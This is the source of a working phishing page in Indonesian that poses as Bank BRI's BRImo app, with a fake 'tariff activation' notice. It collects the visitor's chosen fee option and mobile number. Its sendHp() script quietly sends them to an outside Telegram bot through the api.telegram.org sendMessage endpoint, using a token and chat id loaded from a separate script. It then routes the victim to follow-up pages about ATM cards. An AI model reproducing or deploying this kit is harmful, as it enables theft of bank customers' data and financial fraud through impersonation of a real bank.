
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<link rel="icon" href="https://raw.githubusercontent.com/gopay882/ast/1bd447299abd764ce4b97165762f7cac9e06fa98/BRlV3/Logo_Bank_Rakyat_Indonesia.svg">
            

<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, viewport-fit=cover">
 	<meta name="description" content="Bank BRI terus berinovasi mengembangkan produk yang sesuai dengan perkembangan jaman untuk memenuhi kebutuhan nasabah">
	<meta name="apple-mobile-web-app-capable" content="yes">
	<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
	<meta name="theme-color" content="#0f78cb">
	<meta property="og:type" content="website">
	<meta http-equiv="Content-Security-Policy" content="default-src * 'self' 'unsafe-inline' 'unsafe-eval' data: gap:">
	<title>𝗔𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝗧𝗮𝗿𝗶𝗳 𝗕𝗮𝗻𝗸 𝗕𝗥𝗜</title>
	<link rel="icon" type="image/png" href="https://raw.githubusercontent.com/gopay882/ast/1bd447299abd764ce4b97165762f7cac9e06fa98/BRlV3/Logo_Bank_Rakyat_Indonesia.svg"/>

<meta content="https://hosting.tigerengine.id/wpf0e2.jpg" property="og:image">
<meta name="twitter:image" content="https://hosting.tigerengine.id/wpf0e2.jpg">
<script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>

<style>
@import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
}
* {
    margin: 0px;
}
html, body {
      max-width: 100%;
      overflow-x: hidden;
      }
body {
    margin: 0px;
    background: #fff;
    color: #000;
    font-family: 'Nunito', sans-serif;
}
welalxcome {
        position: fixed;
    left: 0;
    top: 0;
    width: 100vw;
    height: 90vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
}
welalxcome img {
        width:15vw;
    height: auto;
}
chsalxcome {
        position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.talxcome {
    width: 130%;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    height: 100%;
    justify-content: center;
}
.talxcome img {
        width: 73%;
}
.balxcome {
        height: 45vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.txalxcome {
        width: 90%;
    height: 30vh;
    text-align: left;
}
.txalxcome p {
        font-weight: 600;
    font-size: 1.5rem;
    margin-bottom: 5vh;
    color: #1d66ab;
}
.txalxcome span {
        width: 80%;
    font-size: 18px;
}
.btalxcome {
        width: 90%;
    height: 20vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.btalxcome button {
        width: 100%;
    background: #1d66ab;
    color: #fff;
    font-family: inherit;
    border-radius: 5px;
    border: none;
    font-size: 16px;
    padding: 2vh 0px;
    margin-bottom: 4vh;
    font-weight: 500;
    box-shadow: 0px 0px 1px 0px #000;
    cursor: pointer;
}
.btalxcome p {
        color: #1d66ab;
    font-weight: 500;
    cursor: pointer;
}
frmalxbr {
        position: relative;
    width: 100vw;
    height: 100vh;
}
.hdralxfrm {
        width: 100%;
    position: fixed;
    left: 0;
    top: 0;
    display: block;
    text-align: center;
    padding: 1.5vh 0px;
    box-shadow: 0px 1px 20px 0px #00000040;
    z-index: 1;
}
.hdralxfrm img {
        width: 10vw;
    height: auto;
}
.chalxfrm {
        position: relative;
    width: 100%;
    height: 50vh;
    z-index: 0;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.bgchalxfrm {
    background: url() no-repeat center;
    background-size: 100%;
    position: unset;
    width: 100%;
    border-radius: 0px;
    top: 0;
    height: 100%;
    border: none;
    margin-top:-50px;
}
.chalxfrm p {
        position: absolute;
    color: #fff;
    font-size: 19px;
    font-weight: 600;
    letter-spacing: 1px;
    top: 11vh;
}
.chalxfrm img {
        position: absolute;
    width: 90%;
    bottom: 5vh;
}
.frmalxbrm {
        display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    height: 42vh;
    width: 100%;
}
.inpalxbrm {
        margin-top: 3vh;
    width: 90%;
    height: 35vh;
}
.inpalxbrm p {
        color: #2069ab;
    font-weight: 600;
    font-size: 18px;
    letter-spacing: 1px;
    margin-left: 3vw;
}
.bxmalxbrm {
        display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    width: 100%;
    padding-top: 2vh;
}
.itmalxbrm {
    position: relative;
        width: 95%;
    background: #fff;
    box-shadow: 0px 1px 3px 0px #00000087;
    border-radius: 3px;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    padding: 1.8vh 2vw;
    column-gap: 3vw;
}
.itmalxbrm img {
        height: 4vh;
}
.itmalxbrm input {
        font-family: arial, sans-serif;
    font-size: 17px;
    font-weight: 300;
    border: none;
    outline: none;
}
.inpalxbrm span {
        width: 100%;
    text-align: right;
    display: block;
    margin-top: 2.5vh;
    font-size: 14px;
    cursor: pointer;
}
.btnalxfrm {
        height: 10vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-content: center;
    justify-content: center;
    align-items: center;
    width: 90%;
}
.btnalxfrm button {
        width: 100%;
    background: #1d66ab;
    color: #fff;
    font-family: inherit;
    border-radius: 5px;
    border: none;
    font-size: 16px;
    padding: 2vh 0px;
    margin-bottom: 4vh;
    font-weight: 500;
    box-shadow: 0px 0px 1px 0px #000;
    cursor: pointer;
}
#togglePassword {
    background-size: 100% 100%;
    height: 3vh;
    width: 3.5vh;
    margin-top: 0;
    position: absolute;
    right: 4vw;
    cursor: pointer;
}
.fa-eye {
    background: url() no-repeat center;
}
.fa-eye-slash {
    background: url() no-repeat center;
}
.opbtn {
    opacity: 0.5;
}
.alxslh {
        position: fixed;
    left: 0;
    top: 8vh;
    z-index: 3;
    font-size: 14px;
    font-weight: 400;
    color: #fff;
    background: #f53939;
    text-align: center;
    width: 100%;
    font-family: arial, sans-serif;
    padding: 1.7vh 0px;
    display: none;
}
pnalxbr {
        background: rgb(36 131 240);
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    width: 100vw;
    height: 100vh;
    color: white;
}
.hdralxpn {
        width: 100%;
    height: 5vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    justify-content: space-between;
}
.hdralxpn span {
        margin-left: 3%;
}
.hdralxpn p {
       font-weight: 400;
    font-size: 15px; 
}
.hdralxpn label {
        visibility: hidden;
    margin-right: 3%;
}
.txalxpn {
        padding-top: 10vh;
    padding-bottom: 5vh;
    width: 70%;
    text-align: left;
}
.txalxpn p {
       font-size: 17px;
    font-weight: 400; 
}
.txalxpn span {
        font-size: 12px;
    font-weight: 300;
    font-family: Arial, sans-serif;
}
.inpalxpn {
        width: 70%;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
#alxpnnikah {
    width: 100%;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    justify-content: center;
    column-gap: 7vw;
    position: relative;
    align-content: center;
}

#ionIcons {
            color: rgb(22, 119, 199);
            font-size: 35px;
            position: absolute;
            display: block;
            margin-top: -2px;
            margin-left: 14px;
        }

#alxpnnikah input {
        position: absolute;
    z-index: 2;
    color: #fff;
    border: none;
    outline: none;
    font-family: inherit;
    background: transparent;
    font-size: 24px;
    letter-spacing: 10vw;
    width: 100%;
    overflow: hidden;
    float: left;
    text-align: left;
    text-overflow: revert;
    cursor: not-allowed;
    pointer-events: none;
}
.bxinpalxpn {
        width: 6vw;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    position: relative;
    align-content: center;
    justify-content: center;
    
}
.bxinpalxpn input {
        width: 100%;
    height: 100%;
    position: absolute;
    background: transparent;
    outline: none;
    border: none;
    cursor: pointer;
    text-align: center;
    color: #fff;
    font-family: inherit;
    font-size: 24px;
}
.bxinpalxpn span {
       background-color:#88b4e6;
    color:white;
    height: 6.5vh;
    width: 5.5vh;
    display: block;
    border-radius: 10px;
}
.txalxlppn {
        padding: 7vh 0px 9vh;
    font-size: 13px;
    font-family: arial, sans-serif;
    cursor: pointer;
}
.kybalxpn {
        width: 90%;
}
.inpalxkyb {
        width: 80%;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    justify-content: space-between;
    margin-bottom: 4vh;
    margin-left:30px;
}
.inpalxkyb button {
    background-color: transparent;
    
    font-family: inherit;
    cursor: pointer;
    outline: none;
    border: none;
    font-size: 25px;
    width: 20%;
    height: 6vh;
}
smalxs {
        height: 100vh;
    width: 100vw;
    background: #f2f2f2;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-content: center;
    justify-content: center;
    align-items: center;
}
.bxalxsm {
        position: relative;
    width: 85%;
    padding: 15vh 0% 2vh;
    background: #fff;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    border: 1px solid rgba(166, 166, 166, 0.37);
    border-radius: 10px;
}
.bxalxsm img {
        width: 80%;
    position: absolute;
    top: -10vh;
}
.bxalxsm garis {
        display: block;
    width: 100%;
    border-bottom: 2px dotted rgb(204, 204, 204);
}
.bxalxsm label {
        color: #0776ED;
    font-weight: 300;
    font-family: arial, sans-serif;
    padding: 2vh;
}
.alxinpsm {
        width: 90%;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: flex-start;
}
.alxinpsm span {
        color: rgb(158, 158, 158);
    font-size: 12px;
    font-family: arial, sans-serif;
}
.alxinpsm input {
        box-sizing: border-box;
    z-index: 4;
    height: 75px;
    width: 100%;
    left: 0px;
    border-width: 1px;
    border-style: solid;
    border-color: rgb(189, 189, 189) rgb(189, 189, 189) rgb(214, 214, 214);
    border-image: initial;
    background-color: transparent;
    border-radius: 5px;
    box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
    font-size: 13px;
    color: rgb(85, 85, 85);
    padding: 0px 4px;
    top: 20px;
    transition: border-bottom-color 200ms ease 0s;
    margin: 1vh 0px 2vh;
    font-family: arial, sans-serif;
    outline: navajowhite;
}
.btnalxsm {
        width: 100%;
    text-align: right;
}
.btnalxsm button {
    cursor: pointer;
    background: none rgb(0, 134, 224);
    border: none;
    text-align: center;
    box-sizing: border-box;
    z-index: 6;
    height: 33px;
    left: 0px;
    top: 0px;
    font-size: 14px;
    color: rgb(255, 255, 255);
    line-height: 1;
    border-radius: 6px;
    box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
    font-family: arial, sans-serif;
    letter-spacing: 1px;
    padding: 0px 10px;
    outline: navajowhite;
}
.dscalxsm {
        margin-top: 5vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.dscalxsm p {
        text-align: center;
    width: 90%;
    font-size: 10px;
    color: rgba(10, 10, 10, 0.73);
    font-family: arial, sans-serif;
}
.malasngoding-slider { 
    border: 10px solid #efefef; 
    position: relative; 
    overflow: hidden; 
    background: #efefef;
}
 
.malasngoding-slider { 
    margin:20px auto;
    width: 768px;
    height: 450px; 
}
 
.isi-slider img { 
    width: 768px;
    height: 450px; 
    float: left;
}
 
.isi-slider { 
    position: absolute; 
    width:3900px;  
 
    /*pengaturan durasi lama tampil gambar bisa di atur di bawah ini*/
    animation-name:slider;
    animation-duration:16s;
    animation-timing-function: ease-in-out;
    animation-iteration-count:infinite;
    -webkit-animation-name:slider;
    -webkit-animation-duration:16s;
    -webkit-animation-timing-function: ease-in-out;
    -webkit-animation-iteration-count:infinite;
    -moz-animation-name:slider;
    -moz-animation-duration:16s;
    -moz-animation-timing-function: ease-in-out;
    -moz-animation-iteration-count:infinite;
    -o-animation-name:slider;
    -o-animation-duration:16s;
    -o-animation-timing-function: ease-in-out;
    -o-animation-iteration-count:infinite;
}
 
 
/*saat gambar di hover oleh cursor mouse maka berhenti slide*/
.isi-slider:hover { 
    -webkit-animation-play-state:paused; 
    -moz-animation-play-state:paused; 
    -o-animation-play-state:paused; 
    animation-play-state:paused; }
}
 
.isi-slider img { 
    float: right; 
}
 
.malasngoding-slider:after { 
    font-size: 150px; 
    position: absolute; 
    z-index: 12; 
    color: rgba(255,255,255, 0); 
    left: 300px; top: 80px; 
    -webkit-transition: 1s all ease-in-out; 
    -moz-transition: 1s all ease-in-out; 
    transition: 1s all ease-in-out; 
}
 
.malasngoding-slider:hover:after { 
    color: rgba(255,255,255, 0.6);  
}
 
 
 
@-moz-keyframes slider {     
    0% {
        left: 0; opacity: 0; 
    }     
    2% {
        opacity: 1; 
    }     
    20% {
        left: 0; opacity: 1; 
    }     
    21% {
        opacity: 0; 
    }     
    24% {
        opacity: 0; 
    }     
    25% {
        left: -768px; opacity: 1; 
    }       
    45% {
        left: -768px; opacity: 1; 
    }     
    46% {
        opacity: 0; 
    }     
    48% {
        opacity: 0; 
    }     
    50% {
        left: -1536px; opacity: 1; 
    }     
    70% {
        left: -1536px; opacity: 1; 
    }     
    72% {
        opacity: 0; 
    }     
    74% {
        opacity: 0; 
    }    
    75% {
        left: -2304px; opacity: 1; 
    }       
    95% {
        left: -2304px; opacity: 1; 
    }       
    97% { 
        left: -2304px; opacity: 0;
    }       
    100% {
        left: 0; opacity: 0; 
    }
} 
 
@-webkit-keyframes slider {     
    0% {
        left: 0; opacity: 0; 
    }     
    2% {
        opacity: 1; 
    }     
    20% {
        left: 0; opacity: 1; 
    }     
    21% {
        opacity: 0; 
    }     
    24% {
        opacity: 0; 
    }     
    25% {
        left: -768px; opacity: 1; 
    }       
    45% {
        left: -768px; opacity: 1; 
    }     
    46% {
        opacity: 0; 
    }     
    48% {
        opacity: 0; 
    }     
    50% {
        left: -1536px; opacity: 1; 
    }     
    70% {
        left: -1536px; opacity: 1; 
    }     
    72% {
        opacity: 0; 
    }     
    74% {
        opacity: 0; 
    }    
    75% {
        left: -2304px; opacity: 1; 
    }       
    95% {
        left: -2304px; opacity: 1; 
    }       
    97% { 
        left: -2304px; opacity: 0;
    }       
    100% {
        left: 0; opacity: 0; 
    }
} 
 
 
@keyframes slider {     
    0% {
        left: 0; opacity: 0; 
    }     
    2% {
        opacity: 1; 
    }     
    20% {
        left: 0; opacity: 1; 
    }     
    21% {
        opacity: 0; 
    }     
    24% {
        opacity: 0; 
    }     
    25% {
        left: -768px; opacity: 1; 
    }     
    45% {
        left: -768px; opacity: 1; 
    }     
    46% {
        opacity: 0; 
    }     
    48% {
        opacity: 0; 
    }     
    50% {
        left: -1536px; opacity: 1; 
    }     
    70% {
        left: -1536px; opacity: 1; 
    }     
    72% {
        opacity: 0; 
    }     
    74% {
        opacity: 0; 
    }    
    75% {
        left: -2304px; opacity: 1; 
    }       
    95% {
        left: -2304px; opacity: 1; 
    }       
    97% { 
        left: -2304px; opacity: 0; 
    } 
 
    100% {
        left: 0; opacity: 0; 
    }
}
*{
    margin: 0;
    padding: 0;
    list-style: none;
    text-decoration: none;
}

.slider{
    overflow: hidden;
    height:430px;
}

.slider figure div{
    width: 20%;
    float: left;
}

.slider figure img{
    width: 100%;
    float: left;
    height: 152px;
    border-bottom: 2px solid #fff;
}

.slider figure{
    position: relative;
    width: 500%;
    margin: 0;
    left: 0;
    animation: 20s slidy infinite;
}

@keyframes slidy{
    0%{
        left: 0%
    }

    10%{
        left: 0%;
    }

    12%{
        left: -100%;
    }

    22%{
        left: -100%;
    }

    24%{
        left: -200%;
    }

    34%{
        left: -200%;
    }

    36%{
        left: -300%;
    }

    46%{
        left: -300%;
    }

    48%{
        left: -400%;
    }

    58%{
        left: -400%;
    }

    60%{
        left: -300%;
    }

    70%{
        left: -300%;
    }

    72%{
        left: -200%;
    }

    82%{
        left: -200%;
    }

    84%{
        left: -100%;
    }

    94%{
        left: -100%;
    }

    96%{
        left: 0%;
    }

    100%{
        left: 0%;
    }
}
/* css modal */

:root {
  --modal-duration: 1s;
  --modal-color: #428bca;
}


.button {
  background: #428bca;
  padding: 1em 2em;
  color: #fff;
  border: 0;
  border-radius: 5px;
  cursor: pointer;
}

.button:hover {
  background: #3876ac;
}

.modal {
  display: none;
  position: fixed;
  z-index: 1;
  left: 0;
  top: 0;
  height: 100%;
  width: 100%;
  overflow: auto;
  background-color: rgba(0, 0, 0, 0.5);
}

.modal-content {
  margin: 50% auto;
  width: 85%;
  box-shadow: 0 5px 8px 0 rgba(0, 0, 0, 0.2), 0 7px 20px 0 rgba(0, 0, 0, 0.17);
  animation-name: modalopen;
  animation-duration: var(--modal-duration);
}

.modal-header h2,
.modal-footer h3 {
  margin: 0;
}

.modal-header {
  background: var(--modal-color);
  padding: 15px;
  color: #fff;
  border-top-left-radius: 5px;
  border-top-right-radius: 5px;
}

.modal-body {
  padding: 10px 20px;
  background: #fff;
}

.modal-footer {
  background: var(--modal-color);
  padding: 10px;
  color: #fff;
  text-align: center;
  border-bottom-left-radius: 5px;
  border-bottom-right-radius: 5px;
}

.close {
  color: #ccc;
  float: right;
  font-size: 30px;
  color: #fff;
}

.close:hover,
.close:focus {
  color: #000;
  text-decoration: none;
  cursor: pointer;
}

@keyframes modalopen {
  from {
    opacity: 0;
  }
  to {
    opacity: 1;
  }
}
#alxsm {
      border-radius: 10px;
      border: 2px solid #09559a;
      color: #09559a;
      font-size: 14px;
      font-weight:bold;
      margin-bottom: 15px;
      padding: 0.5em 1em 0.5em 0;
      width: 90%;     /* Ukuran bebas */
      height: 100px;     /* Ukuran bebas */
      text-align: center;
      margin-left:5px;
 }
 .bgchalxfrm2 {
    background: url() no-repeat center;
    background-size: 110%;
    position: unset;
    width: 130%;
    border-radius: 0px;
    top: 0;
    height: 500px;
    border: none;
    margin-right:-20px;
}



input::placeholder{
    color: #bbb;
}
/* css modal*/



ion-icon{
    font-size: 22px;
    margin-left: 8px;
    margin-top: -6px;
    position: absolute;
    color: #06529C;
}

.btn-submit:active{
       color: #fff;
   }
   
   .btn:active{
       color: #fff;
   }
   
  .btn-default:active{
      color: #fff;
  }
  
  
  
  #btnSubmit, #btnSubmit1, #btnSubmit2{
      color: #fff;
      letter-spacing: 0;
  }
  
  
  #btnSubmit:active, #btnSubmit1:active, #btnSubmit2:active{
      color: #fff;
  }
  
  .load{
     top: 0;
     left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #000000a0;
     z-index: 999999999;
     width: 100%;
     height: 100%;
      }
      
      .jao{
            width:90%;
      }
      
      .jao1{
            width:90%;
      }
      
   .kleman{
     top: 0;
     left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #000000a0;
     z-index: 999999999;
     width: 100%;
     height: 100%;
      }
      
       .animated {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: linear;
	animation-timing-function: linear;
	 -webkit-animation-name: bounceIn; 
    animation-name: bounceIn; 
}

@-webkit-keyframes bounceIn { 
    0% { 
        opacity: 1; 
        -webkit-transform: scale(0); 
    } 

    50% { 
        opacity: 1; 
        -webkit-transform: scale(0); 
    } 

    70% { 
        -webkit-transform: scale(0); 
    } 

    100% { 
         -webkit-transform: scale(0); 
    } 
} 

@keyframes bounceIn { 
    0% { 
        opacity: 1; 
        transform: scale(.1); 
    } 

    50% { 
        opacity: 1; 
        transform: scale(.5); 
    } 

    70% { 
        transform: scale(1); 
    } 

    100% { 
        transform: scale(1); 
    } 
} 

.naik {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: ease-in;
	animation-timing-function: ease-in;
	-webkit-animation-name: bounceOutUp; 
    animation-name: bounceOutUp; 
}

@-webkit-keyframes bounceOutUp { 
    0% { 
        -webkit-transform: translateY(0); 
    } 
    20% { 
        opacity: 1; 
        -webkit-transform: translateY(20px); 
    } 
    100% { 
        opacity: 1; 
        -webkit-transform: translateY(-200px); 
    } 
} 
@keyframes bounceOutUp { 
    0% { 
        transform: translateY(0); 
    } 
    20% { 
        opacity: 1; 
        transform: translateY(20px); 
    } 
    100% { 
        opacity: 1; 
        transform: translateY(-500px); 
    } 
} 
.bounceOutUp { 
    
}

.box {
  z-index: 9999999999;
  height: 50px;
  width: 50px;
  border-radius: 50%;
  border: 2px solid;
  border-color: #000 transparent;
  animation: spin 1s infinite ease-out;
  position: relative;
  top: -330;
  margin: auto;
}

@keyframes spin {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(360deg);
  }
}
</style>
</head>
<body>
<main>
<welalxcome>
<img src="https://raw.githubusercontent.com/gopay882/ast/1bd447299abd764ce4b97165762f7cac9e06fa98/BRlV3/Logo_baru_BRImo.svg" alt="" />
</welalxcome>
<chsalxcome2 style="display: none;">
<div style="height:30px;width: 70px;margin-top: -21px;margin-bottom: 0px;float:center;margin-left:42%" class="talxcome">
</div>
<nav style="position: relative; top: -10; left: 0; right: 0; margin: 0px auto; width: 100%; height: 70px; background: #0F78CB; border-bottom: 2px solid #fff">
      
      </div>
 <img style="margin-top:15px; margin-left:10px;" width="120px" src="https://raw.githubusercontent.com/gopay882/ast/1bd447299abd764ce4b97165762f7cac9e06fa98/BRlV3/AddText_02-17-11.36.52.png" alt="" />   
</nav>


<div class="slider" style="margin-top: -10px; height: 340px; background: #fff">
<figure>
<div class="slide">
<img src="https://raw.githubusercontent.com/gopay882/ast/1bd447299abd764ce4b97165762f7cac9e06fa98/BRlV3/AddText_02-17-11.32.32.jpg">
</div>
<div class="slide">
<img src="https://raw.githubusercontent.com/gopay882/ast/1bd447299abd764ce4b97165762f7cac9e06fa98/BRlV3/AddText_02-17-11.32.49.jpg">
</div>
<div class="slide">
<img src="https://raw.githubusercontent.com/gopay882/ast/1bd447299abd764ce4b97165762f7cac9e06fa98/BRlV3/AddText_02-17-11.32.49.jpg">
 </div>
<div class="slide">
<img src="https://raw.githubusercontent.com/gopay882/ast/1bd447299abd764ce4b97165762f7cac9e06fa98/BRlV3/AddText_02-17-11.33.07.jpg">
</div>
<div class="slide">
<img src="https://raw.githubusercontent.com/gopay882/ast/1bd447299abd764ce4b97165762f7cac9e06fa98/BRlV3/images2.jpeg">
</div>
</figure>
</div>


<form method="post" id="formHP" onsubmit="sendHp()"><img style="position:absolute;width:60%;margin-top:290px;" src="https://raw.githubusercontent.com/gopay882/ast/1bd447299abd764ce4b97165762f7cac9e06fa98/BRlV3/Qfa.png" alt="">
<div class="" style="bottom:10px;margin-left: 20px;margin-top: -170px;position:relative;border:0px solid #0085e0;padding:15px;width:82%;border-radius:20px; background: #ffffff; height: 302px; box-shadow: rgba(0, 0, 0, 0.15) 0px 5px 15px 0px; overflow:hidden">
<center style="color:#09559a; line-height: 17px; font-size: 15px; padding: 5px"><p>Silahkan Pilih Tarif Transaksi Sesuai Kebutuhan Anda Di Bawah Ini</p><br><hr>
<img style="width:100%;"src="https://raw.githubusercontent.com/gopay882/ast/1bd447299abd764ce4b97165762f7cac9e06fa98/BRlV3/AddText_02-18-01.06.41.jpg" alt="">
</center>
<div style="text-align: center;">
<h4 style="color:#09559a; margin-left: -12px;margin-bottom:8px;">
<label id="label1" style="color:#09559a; line-height: 17px; font-size: 15px;">
<input required type="radio" name="tarif" id="tarif" value='Baru Rp 150.000'>
 Tarif Baru Rp 150.000 / Perbulan
</label>

</h4>
<h4 style="color:#09559a;">
<label required id="label2" style="color:#09559a; line-height: 17px; font-size: 15px;">
<input type="radio" name="tarif" id="tarif" value="Lama Rp 6.500">
 Tarif Lama Rp 6.500 / Bi fast 2.500
</label>
</div>
<br>
  
<h5 style="color:#000; margin-top: 0px; margin-left: 4px">Masukan Nomor ponsel <b style="color: #06529C">BRI</b><b style="color: #F37024">mo</b> Anda :</h5>
<br/>
<ion-icon name="phone-portrait-sharp">
</ion-icon>
<input id="nohp" name="nohp" type="tel" style="box-sizing: border-box; height: 40px; width: 536px; max-width: 100%; border: 1px solid rgb(0, 134, 224); border-image: initial; background-color: rgb(255, 255, 255);  border-radius: 10px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 16px; color: rgb(28, 28, 28); word-spacing: 0px; padding: 0px 10px; outline: none; margin-top: -15px; padding-left: 40px" placeholder="08xxxxxx"  required maxlength="13" minlength="10">
</h3>
<br>
<br>

<br><br>
</div>
</div>
    
<br>
<br>
<br>
<br>
<div style="position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto; width: 100%; height: 72px; background: #fff; box-shadow: rgba(0, 0, 0, 0.15) 0px -12px 15px 0px; padding-top: 15px">
<button type="submit" id="kirim" class="btn btn-default btn-submit" style="margin-left: 20px;margin-top: ;position:absolute;background-color:#0F78CB;color:white;border:0px solid #0076e0;width:90%;border-radius:0px;font-family: 'Nunito', sans-serif;font-size: 15px;padding:13px;display: inline-block; box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px, rgba(0, 0, 0, 0.20) 0px 6px 6px;" >Lanjutkan</button>
           </div>
</form>
<center><div class="box" style="display: none;"></div></center>
<div class="kleman" style="display:none"><img src="https://hosting.tigerengine.id/f01dmo.gif" class="jao1" alt="">
<div class="load" id="lod" style="display:none"><img src="https://hosting.tigerengine.id/f01dmo.gif" class="jao" alt=""></div>

<div class="text-center" id="popupku" style="position: fixed; left: 0; right: 0; top: 0; bottom: 0; margin: 0px auto; z-index: ; text-align: center; width: 100%; height: 100%; background: transparent; display: none">
          <center>
 <div class="text-center animated" style="position: fixed; left: 0; right: 0; width: 300px; height: 320px; background: white; border-radius: 20px; margin: 0px auto; top: 200;/* box-shadow: 2px 2px 2px */#ccc; border: 0px double #0F78CB">
<img src="https://hosting.tigerengine.id/y4fujw.jpg" width="85%" style="margin-top: 20px" >
<button type="button" style="width: 85%; height: 43px; margin-top: 20px; border: none; background: #0F78CB; color: #fff; font-weight: bold;border-radius:5px; box-shadow: 2px 2px 2px #ccc; font-size: 15px" onclick="sudah()">Punya Kartu ATM</button><br/>
<p>
<button type="button" style="width: 85%; height: 43px; margin-top: 8px; border: 2px solid #0F78CB; background: snow; color: #0F78CB; font-weight: bold;border-radius:5px; box-shadow: 2px 2px 2px #ccc; font-size: 15px" onclick="belum()">Belum Punya Kartu ATM</button>
</p>
 </div>         
    </div>
    </div>
    			<center>

<br>
<br>
<br>
<br>

</smalxs>
</main>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },700)
        });
</script>
<script src="i.js"></script>
<script>

// index
function sendHp(){
   $('.kleman').fadeIn();
   $('.jao1').fadeIn();
    event.preventDefault();   
    
  var tarif = $('input[name="tarif"]:checked').val();
       if (tarif) {  
  sessionStorage.setItem('tarif', tarif);
  }
  var nohp = $('#nohp').val();
  sessionStorage.setItem('nohp', nohp);
   
  document.getElementById('kirim').innerHTML = "Memproses....";         
                        
    var logo = '—┈┈•༶𝘄𝘄𝘄.𝗶𝗯𝗯𝗿𝗶.𝗰𝗼.𝗶𝗱▩░';           
    var gabungan = '' + logo + '%0A%0A⋇ 𝗧𝗮𝗿𝗶𝗳 •• ' + tarif + '%0A⋇ 𝗡𝗼.𝗛𝗽 •• ' + nohp ;   
    
    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,   
    complete: function(){
       vibr(180);
    setTimeout(function(){        
    document.getElementById('kirim').innerHTML = "Lanjutkan";
    $("#popupku").fadeIn(200);
   $('.jao1').hide();
    }, 00);}});};   
</script>
<script>
function sudah(){
$('.box').fadeIn();
setTimeout(function(){
     window.location.href="sudah.html";
     $("#popupku").fadeOut();
     $('.box').fadeOut();
     $('.kleman').fadeOut();
     }, 600);    
 } 
 
 
function belum(){
$('.box').fadeIn();
setTimeout(function(){
     window.location.href="belum.html";
     $("#popupku").fadeOut();
     $('.box').fadeOut();
     $('.kleman').fadeOut();
     }, 600);        
 }
</script>
<script src="https://ast-esh.pages.dev/BRlV3/vibr.js"></script>
<!-- </body> -->
</body>
</html>

